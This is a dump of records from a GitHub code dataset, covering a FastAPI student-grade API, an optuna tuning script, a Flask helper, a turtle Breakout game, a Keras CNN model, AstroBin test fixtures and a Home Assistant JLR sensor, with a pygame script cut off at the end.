models.Grade.final.label('Điểm tổng kết')\n ).select_from(models.Student).join(models.Class).join(models.Grade).join(models.Subject).filter(\n and_(\n models.Student.class_id == classid,\n models.Grade.subject_id == subjectid\n )\n ).all()\n df = pd.DataFrame.from_dict(classPoint)\n Lop = df['Lớp'][0]\n subject = df['Môn học'][0]\n diemTK= np.array([df['Điểm tổng kết']])\n diem = np.round(np.mean(diemTK), 1)\n return f'Điểm trung bình môn {subject} của lớp {Lop} là {diem}'\n else:\n raise HTTPException(status_code=404, detail={\n \"field\": \"subjectid\",\n \"errMsg\": \"Thông tin không hợp lệ\"\n })\n else:\n raise HTTPException(status_code=404, detail={\n \"field\": \"classid\",\n \"errMsg\": \"Thông tin không hợp lệ\"\n })\n \n#pd\n#Thống kê điểm của môn học theo lớp\n@app.get('/statistic/Subject/{subjectid}',\n tags = ['Thế Dương Pandas'],\n description= des.des_api['TheDuongPD']['ThongKeDiemTheoMonHoc'])\ndef get_point_subject_class(subjectid: int, db: Session = Depends(get_db)):\n if(subjectid > 0):\n getSubject = db.query(models.Subject).all()\n if(subjectid > len(getSubject)):\n return {\n \"msg\": \"Không tồn tại môn học\"\n }\n else:\n listStudent = db.query(models.Student.name.label('Họ và tên'),\n models.Class.name.label('Lớp'),\n models.Subject.name.label('Môn học'),\n models.Grade.mid_term.label('Điểm giữa kỳ'),\n 
models.Grade.end_term.label('Điểm cuối kỳ'),\n models.Grade.final.label('Điểm tổng kết')).select_from(models.Student).join(models.Class).join(models.Grade).join(models.Subject).filter(\n and_(\n models.Grade.subject_id == subjectid\n )\n ).all()\n if( len(listStudent) != 0):\n df = pd.DataFrame.from_dict(listStudent)\n classList = df.groupby(df['Lớp']).mean(numeric_only = True).applymap(lambda x: np.round(x, 2))\n subjectName = df['Môn học'][0]\n return {\n \"msg\": f\"Thống kê điểm tổng kết theo lớp môn {subjectName}\",\n \"data\" : classList.T\n }\n else:\n return {\n \"msg\": \"Không tồn tại bản ghi nào\"\n }\n else:\n raise HTTPException(status_code=404, detail={\n \"field\" : \"subjectid\",\n \"errMsg\" : \"Giá trị subjectid không thể nhỏ hơn hoặc bằng 0\"\n })\n#pd\n#Cập nhật tên lớp theo mã lớp\n@app.post('/class/UpdateNameClass', tags=['Thế Dương Pandas'],\n description= des.des_api['TheDuongPD']['CapNhatTenLop'])\ndef post_classroom(classroom: schema.Classroom, db : Session = Depends(get_db)):\n result = \" \"\n if classroom.classid >0 :\n db.query(models.Class).filter(models.Class.id == classroom.classid).update(\n {\n 'name': classroom.className\n })\n db.commit()\n result = db.query(models.Class).filter(models.Class.id == classroom.classid).first()\n \n else:\n result = {\n \"field\": \"classid\",\n \"errMsg\": \"Thông tin không hợp lệ\"\n }\n\n return result\n\n############################## TranTu Region\n#Numpy\n\n#Tính điểm trung bình cuối kì tất cả các môn của một sinh viên theo mã sinh viên \n@app.get('/average_grade/{student_id}', tags=['Trần Văn Tú Numpy'],\n description= des.des_api['TranTuNP']['TrungBinhCuoiKi'])\ndef get_average_grade(student_id: int, db: Session = Depends(get_db)):\n\n student = db.query(models.Student).filter(models.Student.id == student_id).first()\n\n if student:\n grades = db.query(models.Grade).filter(models.Grade.student_id == student_id).all()\n\n if grades:\n grade_values = np.array([grade.final for grade in grades])\n average_grade = np.mean(grade_values)\n return student.name + ' mã sinh viên ' + str(student_id) + ' có điểm cuối kì trung bình là ' + str(average_grade)\n \n else:\n return {\n \"Không tồn tại bản ghi nào\"\n }\n \n else:\n raise HTTPException(status_code=404, detail=f\"sinh viên với ID {student_id} không tồn tại.\")\n \n################################\n#Điểm trung bình cuối kì tất cả các môn của một lớp theo mã lớp\n@app.post('/class/CalculateClassAvg', tags=['Trần Văn Tú Numpy'],\n description= des.des_api['TranTuNP']['TrungBinhCuoiKiLop'])\ndef Calculate_Class_Avg(classID: schema.ClassBase, db: Session = Depends(get_db)):\n if classID.classID != None and classID.classID > 0:\n \n grades = db.query(models.Grade).join(models.Student).join(models.Class).filter(models.Class.id == classID.classID).all()\n\n finals = np.array([grade.final for grade in grades])\n\n avg_final = np.mean(finals)\n \n # Lấy danh sách tất cả lớp\n fullClass = db.query(models.Class).all()\n \n # Tính tổng số lớp\n allClass = len(np.array(fullClass))\n \n if classID.classID > allClass:\n return f\"Mã lớp {classID.classID} không tồn tại!\"\n else:\n return f\"Điểm trung bình cuối tất cả các môn của lớp có mã lớp {classID.classID} là {avg_final:.2f}\"\n else:\n raise HTTPException(status_code=404, detail=f\"Mã lớp {classID.classID} không hợp lệ!\")\n \n\n#Pandas\n\n#Đếm số sinh viên qua môn\n@app.get('/passing_students/{subject_id}', tags=['Trần Văn Tú Pandas'],\n description=des.des_api['TranTuPD']['QuaMon'])\ndef 
count_passing_students_by_subject(subject_id: int, db: Session = Depends(get_db)):\n if subject_id > 0:\n get_subject = db.query(models.Subject).all()\n if subject_id > len(get_subject):\n return {\"msg\": \"Không tồn tại môn học\"}\n else:\n subject = get_subject[subject_id - 1]\n\n df_students = pd.read_sql_query(\n f\"SELECT final AS 'Điểm tổng kết' FROM Student \"\n f\"JOIN Class ON Student.class_id = Class.id \"\n f\"JOIN Grade ON Student.id = Grade.student_id \"\n f\"JOIN Subject ON Grade.subject_id = Subject.id \"\n f\"WHERE Subject.id = {subject_id} AND Grade.final >= 4\",\n db.bind\n )\n\n num_passing_students = len(df_students)\n\n return {\n \"msg\": f\"Số sinh viên qua môn {subject.name} là: {num_passing_students}\"\n }\n else:\n raise HTTPException(status_code=404, detail={\n \"field\": \"subject_id\",\n \"errMsg\": \"Giá trị subject_id không thể nhỏ hơn hoặc bằng 0\"\n })\n\n#Cập nhật tên môn học\n@app.post('/subject/UpdateSubjectName', tags=['Trần Văn Tú Pandas'],\n description=des.des_api['TranTuPD']['CapNhatTenMon'])\ndef update_subject_name(subject_update: schema.SubjectUpdate, db: Session = Depends(get_db)):\n result = {}\n subject = db.query(models.Subject).filter(models.Subject.id == subject_update.subject_id).first()\n \n if subject:\n db.query(models.Subject).filter(models.Subject.id == subject_update.subject_id).update(\n {\n 'name': subject_update.subject_name\n }\n )\n db.commit()\n \n updated_subject = db.query(models.Subject).filter(models.Subject.id == subject_update.subject_id).first()\n \n result = {\n 'message': 'Tên môn đã được cập nhật',\n 'updated_subject': updated_subject\n }\n else:\n result = {\n 'message': 'Mã môn không tồn tại'\n }\n\n return result\n\n","repo_name":"potatoArthurDo/Python-K1N2","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":17693,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"19398073689","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n#\n# optimize_postprocess.py training_dir weight_dir\n# training_dir : dossier du training. 
\n# Défault : training le plus récent dans config['local']['trainings_dir']/config['data']['nomenclature']['name']\n# weights_dir : nom du dossier de poids à utiliser dans le training/train_weights\n# Défaut : le meilleur modèle dans training_dir\n#\n# script d'optimisation du postprocess, ie des poids associé aux 2 postprocess disponibles :\n# - ajout des similarité des noeuds parents\n# - boost de la similarité par une mesure de similarité textuelle basée sur le compte de trigrammes\n# la valeur optimisée est le top-k avec k=config['post_process']['top_X_to_optimize']\n#\n# le script utilise optuna: pour générer des valeurs pour les 2 paramêtres, calculer les performances sur un \n# - on charge le modèle\n# - on charge les données de test du training (jamais vu par le modèle)\n# - on sépare en train/test à nouveau (50/50)\n# - optuna génère des valeurs pour les 2 paramêtres, calcule les performances sur le train et sauvegarde le tout\n# - on s'arrète après config['post_process']['optim_timeout_in_min'] minutes ou config['post_process']['nb_trials'] essais\n# - on update le config.yaml du training avec les meilleures valeurs trouvées\n# - on calcule les performances sur le test avec les meilleurs valeurs de parametres, et on sauvegarde le tout en local et en remote\n#\n# utilise config.yaml dans le dossier de training\n#\n# @author cyril.poulet@starclay.fr\n# @date: oct 2020\n\nimport sys\nsys.path.append('..')\nimport os\nimport yaml\nimport json\nimport shutil\nimport logging.config\nimport s3fs\nfrom tensorflow import keras\nimport numpy as np\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nimport optuna\nfrom optuna import Trial\n\nfrom data_import.bdd import PostGre_SQL_DB\nfrom training_utils import load_config, save_config, push_to_minio, get_trainings_dir, get_last_local_training_dir, get_best_savedmodel\nfrom script_run_top_k import load_model_from_save_dir, run_top_k_on_test\n\n\nif __name__ == \"__main__\":\n\n \"\"\"\n Script permettant d'optimiser les paramêtres de post-process via une exploration de l'espace'\n\n \"\"\"\n import argparse\n args = None\n \n # Logging - Chargement du fichier de configuration log\n with open(os.path.join(os.path.dirname(__file__), 'logging.conf.yaml'), 'r') as stream:\n log_config = yaml.load(stream, Loader=yaml.FullLoader)\n logging.config.dictConfig(log_config)\n\n logger = logging.getLogger()\n\n # path to test\n with open(\"config.yaml\") as f:\n base_config = yaml.safe_load(f)\n TRAININGS_LOCAL_DIR, _ = get_trainings_dir(base_config)\n \n parser = argparse.ArgumentParser(\n description=\"Script pour optimiser le post-process\")\n parser.add_argument(\"model_dir\", nargs='?', type=str, default=None,\n help=\"dossier du training\")\n parser.add_argument(\"weights_dir\", nargs='?', type=str, default=None,\n help=\"nom du dossier de poids à utiliser dans le training/train_weights\")\n args = parser.parse_args()\n \n if hasattr(args, 'model_dir') and args.model_dir:\n save_dir = os.path.abspath(args.model_dir)\n else:\n save_dir = get_last_local_training_dir(TRAININGS_LOCAL_DIR)\n if hasattr(args, 'weights_dir') and args.weights_dir:\n best_weights = os.path.abspath(args.weights_dir)\n else:\n best_weights = get_best_savedmodel(save_dir)\n \n \n save_dir = get_last_local_training_dir(TRAININGS_LOCAL_DIR)\n best_weights = get_best_savedmodel(save_dir)\n\n # add log in training dir\n test_log_file = os.path.join(save_dir, 'topk.log')\n formatter = logging.Formatter(log_config['formatters']['simple']['format'])\n ch = 
logging.FileHandler(test_log_file)\n ch.setLevel('DEBUG')\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n logger_name = 'NomenclatureTopKOptimizer'\n logger = logging.getLogger(logger_name)\n \n logger.info(f'Running post-process optimizer pour {save_dir}/{best_weights}')\n config = load_config(save_dir)\n sync_with_minio = config['minio']['sync']\n\n # re-load all elements\n logger.info('Loading all trained objects')\n try:\n nomenclature, data_cleaner, data_formatter, model, _ = load_model_from_save_dir(save_dir, best_weights)\n modified = False\n if nomenclature.projections is None:\n logger.info('building nomenclature projections')\n nomenclature.build_nomenclature_projections(\n lambda x : model.run_model_single_side(\n [np.array([emb], dtype=np.float32) for emb in data_formatter.format_input(x)])[0])\n modified = True\n if nomenclature.ngram_hot_encodings is None:\n nomenclature.create_trigram_repr()\n modified = True\n if modified:\n data_formatter.save(os.path.join(save_dir, \"batcher\"))\n if sync_with_minio:\n logger.info('pushing to minio')\n push_to_minio(save_dir)\n except Exception as e:\n logger.error(f'Error loading objects : {e}')\n exit(-1)\n\n # loading test data\n logger.info('Loading list of test BIs')\n try:\n test_cabbis_df = pd.read_csv(os.path.join(save_dir, 'cabbi_test.csv'))\n except Exception as e:\n logger.error(f'Error loading list of test BIs : {e}')\n exit(-1)\n \n # split in train/test\n cabbi_optim, cabbi_test = train_test_split(test_cabbis_df, test_size=0.5)\n cabbi_optim.to_csv(os.path.join(save_dir, 'optim_train_cabbis.csv'))\n cabbi_test.to_csv(os.path.join(save_dir, 'optim_test_cabbis.csv'))\n \n def get_sql_request(config, cabbis_df):\n sql_request = config['data']['postgres_sql']\n cabbi_field = [t for t in sql_request.split(' ') if 'cabbi' in t][0].strip(',. 
')\n list_of_cabbi = \"('\" + \"','\".join([str(v) for v in cabbis_df[\"cabbi\"].values]) + \"')\"\n if 'where' in sql_request.lower():\n sql_request += ' AND '\n else:\n sql_request += ' WHERE '\n sql_request += f'{cabbi_field} IN {list_of_cabbi}'\n return sql_request\n \n # run optimizer\n optim_savedir = os.path.join(save_dir,'postprocess_optim')\n os.makedirs(optim_savedir, exist_ok=True)\n \n def objective(trial: Trial):\n \"\"\"\n définit ce qui est fait pendant une passe:\n - génération de valeurs\n - calcul des top-k\n - sauvegarde du tout\n \"\"\"\n if 'post_process' not in config:\n config['post_process'] = {}\n config['post_process']['alpha_tree_mod'] = trial.suggest_uniform(\"alpha_tree\", 0, 1)\n config['post_process']['beta_str_sim_mod'] = trial.suggest_uniform(\"beta_str_sim\", 0, 1)\n \n sql_request = get_sql_request(config, cabbi_optim)\n bdd = PostGre_SQL_DB()\n batch_size = config['trainings']['training_params']['batch_size']\n input_df = bdd.read_from_sql_with_chunksize(sql_request, batch_size)\n nb_docs = len(cabbi_optim[\"cabbi\"].values)\n \n logger.info(f\"Calculating top-k for alpha={config['post_process']['alpha_tree_mod']}, beta={config['post_process']['beta_str_sim_mod']}\")\n global_results, _ = run_top_k_on_test(config, input_df, nb_docs,\n data_cleaner, data_formatter, model,\n to_csv_file=os.path.join(optim_savedir, f'test_results_{trial.number}.csv'))\n logger.info(f'Results: {global_results}')\n global_results['saved_model'] = best_weights\n global_results['alpha_tree_mod'] = config['post_process']['alpha_tree_mod']\n global_results['beta_str_sim_mod'] = config['post_process']['beta_str_sim_mod']\n with open(os.path.join(optim_savedir, f'top_k_{trial.number}.json'), 'w') as f:\n json.dump(global_results, f)\n \n top_x_to_optimize = config['post_process']['top_X_to_optimize']\n trial.report(global_results['top_k_perc'][top_x_to_optimize], step=1)\n return global_results['top_k_perc'][top_x_to_optimize]\n \n #création du l'\"étude\" optuna\n study_name = 'postprocess_optim'\n maximum_time = config['post_process']['optim_timeout_in_min'] * 60 # seconds\n number_of_trials = config['post_process']['nb_trials']\n \n optuna.logging.enable_propagation()\n optuna.logging.disable_default_handler()\n study = optuna.create_study(study_name=study_name, direction='maximize')\n try:\n study.optimize(objective, n_trials=number_of_trials, timeout=maximum_time)\n except Exception as e:\n logger.error(e)\n exit(-1)\n \n # récupératio du résultat et modification de config\n df = study.trials_dataframe()\n df.to_json(os.path.join(optim_savedir, 'optimisation_results.json'))\n best_trial = study.best_trial\n if 'post_process' not in config:\n config['post_process'] = {}\n config['post_process']['alpha_tree_mod'] = best_trial.params[\"alpha_tree\"]\n config['post_process']['beta_str_sim_mod'] = best_trial.params[\"beta_str_sim\"]\n save_config(config, save_dir)\n shutil.copy(os.path.join(optim_savedir, f'test_results_{best_trial.number}.csv'), \n os.path.join(save_dir, 'optim_train_results.csv'))\n \n \n # get final perfs\n sql_request = get_sql_request(config, cabbi_test)\n bdd = PostGre_SQL_DB()\n batch_size = config['trainings']['training_params']['batch_size']\n input_df = bdd.read_from_sql_with_chunksize(sql_request, batch_size)\n nb_docs = len(cabbi_test[\"cabbi\"].values)\n\n logger.info(f'Calculating optimized top-k')\n global_results, _ = run_top_k_on_test(config, input_df, nb_docs,\n data_cleaner, data_formatter, model,\n to_csv_file=os.path.join(save_dir, 
'optim_test_results.csv'))\n logger.info(f'Results: {global_results}')\n global_results['saved_model'] = best_weights\n global_results['alpha_tree_mod'] = config['post_process']['alpha_tree_mod']\n global_results['beta_str_sim_mod'] = config['post_process']['beta_str_sim_mod']\n with open(os.path.join(save_dir, f'optim_top_k.json'), 'w') as f:\n json.dump(global_results, f)\n\n # push on minio\n if sync_with_minio:\n push_to_minio(save_dir)","repo_name":"etalab-ia/ami-ia-insee-aiee2","sub_path":"nomenclatures/script_optimize_postprocess.py","file_name":"script_optimize_postprocess.py","file_ext":"py","file_size_in_byte":10454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"5628117108","text":"from flask import views,request,make_response,json\n\n\ndef _jsonify(data):\n data = json.dumps(data)\n response = make_response(data)\n response.headers['Content-Type'] = 'application/json'\n response.headers['Content-Length'] = len(data)\n return response\n\nclass PostView(views.MethodView):\n def _process_post(self):\n self.data = ((request.data and json.loads(request.data)) if not request.form else dict(request.form.items())) if not request.mimetype == 'application/json' else request.json\n","repo_name":"jstacoder/flask-tasks","sub_path":"flask_tasks/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12276710176","text":"from turtle import Turtle\n\n\nclass Brick:\n margin = 20\n margin = 20\n bricks_widthpx = 45\n bricks_heightpx = 30\n bricks_heightgap = 100\n\n def __init__(self, screen_width, screen_height):\n self.bricks = []\n self.bricks_width = 2\n self.bricks_height = 1\n self.name = \"brick\"\n self.screen_width = screen_width\n self.screen_height = screen_height\n\n self.screen_width = 480\n self.screen_height = 500\n\n def create_brick(self, pos_x, pos_y, color):\n brick = Turtle(shape=\"square\")\n brick.shapesize(self.bricks_height, self.bricks_width)\n brick.color(color)\n brick.penup()\n brick.goto(pos_x, pos_y)\n brick.pendown()\n return brick\n\n def create_bricks(self):\n top_x = -1 * int(self.screen_width / 2) + self.margin + 10\n top_y = int(self.screen_height / 2) - self.margin - self.bricks_heightgap\n\n brick_color = [\"red\", \"orange\", \"green\", \"yellow\"]\n for j in range(4):\n for i in range(int(self.screen_width / self.bricks_widthpx)):\n brick = self.create_brick( i*self.bricks_widthpx + top_x, -j*self.bricks_heightpx + top_y, brick_color[j])\n self.bricks.append(brick)\n\n def hidebrick(self, brick):\n brick.penup()\n brick.goto(99999, 99999)\n brick.pendown()","repo_name":"distareza/Python_BreakoutGame","sub_path":"Brick.py","file_name":"Brick.py","file_ext":"py","file_size_in_byte":1362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"14105356035","text":"from keras import Sequential\nfrom keras.layers import Dense, Convolution1D, Dropout, Flatten, BatchNormalization\n\nfrom models import BasicModel\nfrom reprocess import reshape_1d_feature_for_1d_cnn\nfrom stock_reader import SequenceReader\nfrom util import bias_mean_abs_error\n\n\nclass Cnn1DSingleChannelModel(BasicModel):\n\n def _create_reader(self):\n return SequenceReader(\n self.data_path, self.index_file, self.sequence_length)\n\n def __init__(self, *args, **kwargs):\n super().__init__(*args, **kwargs)\n self.loss = bias_mean_abs_error\n 
self.kernel_size = 4\n\n def _reshape_input(self, raw_features):\n shape, feature = reshape_1d_feature_for_1d_cnn(raw_features)\n self.input_shape = shape\n return feature\n\n def _create(self):\n\n if self.input_shape is None:\n raise ValueError(\"input_shape is not set\")\n\n model = Sequential()\n\n model.add(Convolution1D(filters=64, kernel_size=self.kernel_size,\n padding=\"same\", activation=\"relu\",\n # kernel_regularizer=\"l1\",\n input_shape=self.input_shape))\n model.add(BatchNormalization())\n # model.add(Dropout(0.5))\n\n model.add(Convolution1D(filters=32, kernel_size=self.kernel_size,\n # kernel_regularizer=\"l1\",\n padding=\"same\", activation=\"relu\"))\n model.add(BatchNormalization())\n # model.add(MaxPooling1D())\n # model.add(Dropout(0.5))\n\n model.add(Convolution1D(filters=16, kernel_size=self.kernel_size,\n # kernel_regularizer=\"l1\",\n padding=\"same\", activation=\"relu\"))\n model.add(BatchNormalization())\n # model.add(MaxPooling1D())\n model.add(Dropout(0.4))\n\n model.add(Flatten())\n\n # model.add(Dense(512, activation='relu'))\n # model.add(Dropout(0.5))\n model.add(Dense(512, activation='relu'))\n model.add(BatchNormalization())\n # model.add(Dropout(0.5))\n\n # model.add(Dense(1, activation='linear'))\n model.add(Dense(1, activation='sigmoid'))\n\n # opt = SGD(lr=0.05, momentum=0.0, decay=0.0, nesterov=False)\n\n return model\n","repo_name":"i404/SaltedFish","sub_path":"salted_fish/models/cnn_1d_single_channel_model.py","file_name":"cnn_1d_single_channel_model.py","file_ext":"py","file_size_in_byte":2311,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"35386333475","text":"# Python\nimport json\n\n# Django\nfrom django.contrib.auth.models import User, Group\nfrom django.core.urlresolvers import reverse\nfrom django.db.models import Max\n\n# Third party apps\nfrom subscription.models import Subscription, UserSubscription\n\n# This app\nfrom rawdata.utils import md5_for_file\n\n\n# Utility functions\ndef max_id(Klass):\n new_id = Klass.objects.aggregate(Max('id'))['id__max']\n if new_id is None:\n new_id = 1\n return new_id\n\n\ndef setup_data(testcase):\n # Groups\n Group.objects.create(name = \"Producers\")\n Group.objects.create(name = \"Retailers\")\n Group.objects.create(name = \"Paying\")\n\n Group.objects.create(name = \"affiliate-1\")\n Group.objects.create(name = \"affiliate-10\")\n Group.objects.create(name = \"affiliate-50\")\n Group.objects.create(name = \"affiliate-100\")\n Group.objects.create(name = \"affiliate-inf\")\n Group.objects.create(name = \"retailer-affiliate-1\")\n Group.objects.create(name = \"retailer-affiliate-10\")\n Group.objects.create(name = \"retailer-affiliate-50\")\n Group.objects.create(name = \"retailer-affiliate-100\")\n Group.objects.create(name = \"retailer-affiliate-inf\")\n\n Group.objects.create(name = \"everyone\")\n\n rawdata_atom_group = Group.objects.create(name = \"rawdata-atom\")\n rawdata_meteor_group = Group.objects.create(name = \"rawdata-meteor\")\n rawdata_luna_group = Group.objects.create(name = \"rawdata-luna\")\n rawdata_sol_group = Group.objects.create(name = \"rawdata-sol\")\n rawdata_galaxia_group = Group.objects.create(name = \"rawdata-galaxia\")\n\n donor_coffee_monthly_group = Group.objects.create(name = \"astrobin-donor-coffee-monthly\")\n donor_snack_monthly_group = Group.objects.create(name = \"astrobin-donor-snack-monthly\")\n donor_pizza_monthly_group = Group.objects.create(name = \"astrobin-donor-pizza-monthly\")\n 
donor_movie_monthly_group = Group.objects.create(name = \"astrobin-donor-movie-monthly\")\n donor_dinner_monthly_group = Group.objects.create(name = \"astrobin-donor-dinner-monthly\")\n\n donor_coffee_yearly_group = Group.objects.create(name = \"astrobin-donor-coffee-yearly\")\n donor_snack_yearly_group = Group.objects.create(name = \"astrobin-donor-snack-yearly\")\n donor_pizza_yearly_group = Group.objects.create(name = \"astrobin-donor-pizza-yearly\")\n donor_movie_yearly_group = Group.objects.create(name = \"astrobin-donor-movie-yearly\")\n donor_dinner_yearly_group = Group.objects.create(name = \"astrobin-donor-dinner-yearly\")\n\n Group.objects.create(name = \"IOTD_Staff\")\n\n # Subscriptions\n Subscription.objects.create(name = \"Atom\", description = \"512 MB\", price = 0, recurrence_period = 100, recurrence_unit = \"Y\", group = rawdata_atom_group, trial_period = 0, trial_unit = \"D\")\n Subscription.objects.create(name = \"Meteor\", description = \"5 GB\", price = 2.95, recurrence_period = 1, recurrence_unit = \"M\", group = rawdata_meteor_group, trial_period = 7, trial_unit = \"D\")\n Subscription.objects.create(name = \"Luna\", description = \"100 GB\", price = 9.95, recurrence_period = 1, recurrence_unit = \"M\", group = rawdata_luna_group, trial_period = 7, trial_unit = \"D\")\n Subscription.objects.create(name = \"Sol\", description = \"250 GB\", price = 19.95, recurrence_period = 1, recurrence_unit = \"M\", group = rawdata_sol_group, trial_period = 7, trial_unit = \"D\")\n Subscription.objects.create(name = \"Galaxia\", description = \"500 GB\", price = 49.95, recurrence_period = 1, recurrence_unit = \"M\", group = rawdata_galaxia_group, trial_period = 7, trial_unit = \"D\")\n\n Subscription.objects.create(name = \"AstroBin Donor Coffee Monthly\", description = \"\", price = 2.50, recurrence_period = 1, recurrence_unit = \"M\", group = donor_coffee_monthly_group, trial_period = 0, trial_unit = \"D\")\n Subscription.objects.create(name = \"AstroBin Donor Snack Monthly\", description = \"\", price = 3.50, recurrence_period = 1, recurrence_unit = \"M\", group = donor_snack_monthly_group, trial_period = 0, trial_unit = \"D\")\n Subscription.objects.create(name = \"AstroBin Donor Pizza Monthly\", description = \"\", price = 6.00, recurrence_period = 1, recurrence_unit = \"M\", group = donor_pizza_monthly_group, trial_period = 0, trial_unit = \"D\")\n Subscription.objects.create(name = \"AstroBin Donor Movie Monthly\", description = \"\", price = 10.00, recurrence_period = 1, recurrence_unit = \"M\", group = donor_movie_monthly_group, trial_period = 0, trial_unit = \"D\")\n Subscription.objects.create(name = \"AstroBin Donor Dinner Monthly\", description = \"\", price = 25.00, recurrence_period = 1, recurrence_unit = \"M\", group = donor_dinner_monthly_group, trial_period = 0, trial_unit = \"D\")\n\n Subscription.objects.create(name = \"AstroBin Donor Coffee Yearly\", description = \"\", price = 24.00, recurrence_period = 1, recurrence_unit = \"Y\", group = donor_coffee_yearly_group, trial_period = 0, trial_unit = \"D\")\n Subscription.objects.create(name = \"AstroBin Donor Snack Yearly\", description = \"\", price = 34.00, recurrence_period = 1, recurrence_unit = \"Y\", group = donor_snack_yearly_group, trial_period = 0, trial_unit = \"D\")\n Subscription.objects.create(name = \"AstroBin Donor Pizza Yearly\", description = \"\", price = 60.00, recurrence_period = 1, recurrence_unit = \"Y\", group = donor_pizza_yearly_group, trial_period = 0, trial_unit = \"D\")\n 
Subscription.objects.create(name = \"AstroBin Donor Movie Yearly\", description = \"\", price = 100.00, recurrence_period = 1, recurrence_unit = \"Y\", group = donor_movie_yearly_group, trial_period = 0, trial_unit = \"D\")\n Subscription.objects.create(name = \"AstroBin Donor Dinner Yearly\", description = \"\", price = 250.00, recurrence_period = 1, recurrence_unit = \"Y\", group = donor_dinner_yearly_group, trial_period = 0, trial_unit = \"D\")\n\n\n testcase.unsubscribed_user = User.objects.create_user('username_unsub', 'fake0@email.tld', 'passw0rd')\n testcase.subscribed_user = User.objects.create_user('username_sub', 'fake1@email.tld', 'passw0rd')\n testcase.subscribed_user_2 = User.objects.create_user('username_sub_2', 'fake2@email.tld', 'passw0rd')\n testcase.subscribed_user_3 = User.objects.create_user('username_sub_3', 'fake3@email.tld', 'passw0rd')\n\n testcase.group = Group.objects.create(name = 'rawdata-test')\n testcase.group.user_set.add(testcase.subscribed_user, testcase.subscribed_user_2)\n\n testcase.group_empty = Group.objects.create(name = 'rawdata-empty')\n testcase.group_empty.user_set.add(testcase.subscribed_user_3)\n\n testcase.subscription = Subscription.objects.create(\n name = 'test_subscription',\n price = 1.0,\n group = testcase.group)\n testcase.subscription_empty = Subscription.objects.create(\n name = 'test_subscription_empty',\n price = 1.0,\n group = testcase.group_empty)\n\n testcase.user_subscription = UserSubscription.objects.create(\n user = testcase.subscribed_user,\n subscription = testcase.subscription,\n cancelled = False)\n\n testcase.user_subscription_2 = UserSubscription.objects.create(\n user = testcase.subscribed_user_2,\n subscription = testcase.subscription,\n cancelled = False)\n testcase.user_subscription_3 = UserSubscription.objects.create(\n user = testcase.subscribed_user_3,\n subscription = testcase.subscription_empty,\n cancelled = False)\n\n\ndef teardown_data(testcase):\n testcase.subscribed_user.delete()\n testcase.unsubscribed_user.delete()\n testcase.group.delete()\n testcase.subscription.delete()\n testcase.user_subscription.delete()\n\n\ndef get_file():\n f = open('rawdata/fixtures/test.fit', 'rb')\n h = md5_for_file(f)\n\n f.seek(0)\n return f, h\n\n\ndef get_unsupported_file():\n f = open('rawdata/fixtures/test.png', 'rb')\n h = md5_for_file(f)\n\n f.seek(0)\n return f, h\n\n\ndef test_response(testcase, url, data, expected_status_code = 200,\n expected_field = None, expected_message = None):\n response = testcase.client.post(url, data)\n response_json = json.loads(response.content)\n testcase.assertEquals(response.status_code, expected_status_code)\n if expected_field:\n testcase.assertEquals(\n response_json[expected_field][0],\n expected_message)\n\n return response_json\n\ndef upload_file(testcase):\n f, h = get_file()\n testcase.client.login(username = 'username_sub', password = 'passw0rd')\n response = test_response(\n testcase,\n reverse('api.rawdata.rawimage.list'),\n {'file': f, 'file_hash': h},\n 201)\n testcase.client.logout()\n return response['id']\n\ndef upload_unsupported_file(testcase):\n f, h = get_unsupported_file()\n testcase.client.login(username = 'username_sub', password = 'passw0rd')\n response = test_response(\n testcase,\n reverse('api.rawdata.rawimage.list'),\n {'file': f, 'file_hash': h},\n 201)\n testcase.client.logout()\n return 
response['id']\n","repo_name":"daPhantom/astrobin","sub_path":"rawdata/tests/common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":8915,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12937196716","text":"\"\"\"Add Support for JLR Incontrol Binary Sensors.\"\"\"\nimport logging\n\nfrom homeassistant.components.binary_sensor import BinarySensorDevice\n\nfrom . import RESOURCES, JLREntity\n\n_LOGGER = logging.getLogger(__name__)\n\n\ndef setup_platform(hass, config, add_devices, discovery_info=None):\n \"\"\"Set up the JLR Binary sensors.\"\"\"\n if discovery_info is None:\n return\n add_devices([JLRSensor(hass, *discovery_info)])\n\n\nclass JLRSensor(JLREntity, BinarySensorDevice):\n \"\"\"Representation of a JLR sensor.\"\"\"\n\n @property\n def is_on(self):\n \"\"\"Return true if the binary sensor is on.\"\"\"\n val = self.get_updated_info()\n if val is None:\n return val\n\n if val:\n val = val[self._attribute]\n else:\n return None\n\n if self._attribute in [\n \"DOOR_IS_ALL_DOORS_LOCKED\",\n \"IS_SUNROOF_OPEN\"\n ]:\n return bool(val == \"FALSE\")\n\n return val\n\n @property\n def device_class(self):\n \"\"\"Return the class of this sensor.\"\"\"\n return RESOURCES[self._attribute][3]\n\n @property\n def icon(self):\n \"\"\"Return the icon.\"\"\"\n return RESOURCES[self._attribute][2]\n","repo_name":"MZorzy/JLR_InControl","sub_path":"custom_components/jlrincontrol/binary_sensor.py","file_name":"binary_sensor.py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"12875574119","text":"import pygame\r\n\r\nimport sys\r\n\r\nsys.path.append('levels')\r\n\r\nfrom levels import *\r\n\r\n \r\npygame.init()\r\npygame.display.set_caption('Дровосек 2')\r\nfrom Player import Player\r\nfrom platforms import Platform\r\n\r\n\r\n#SOUND\r\n\r\n\r\nSIZE = [700, 600]\r\n#Window create\r\nwindow = pygame.display.set_mode(SIZE)\r\n#game win\r\nscreen = pygame.Surface(SIZE)\r\n#SAVEFILE\r\nSAVES = open(\"saves.txt\", 'r' )\r\nfileS = 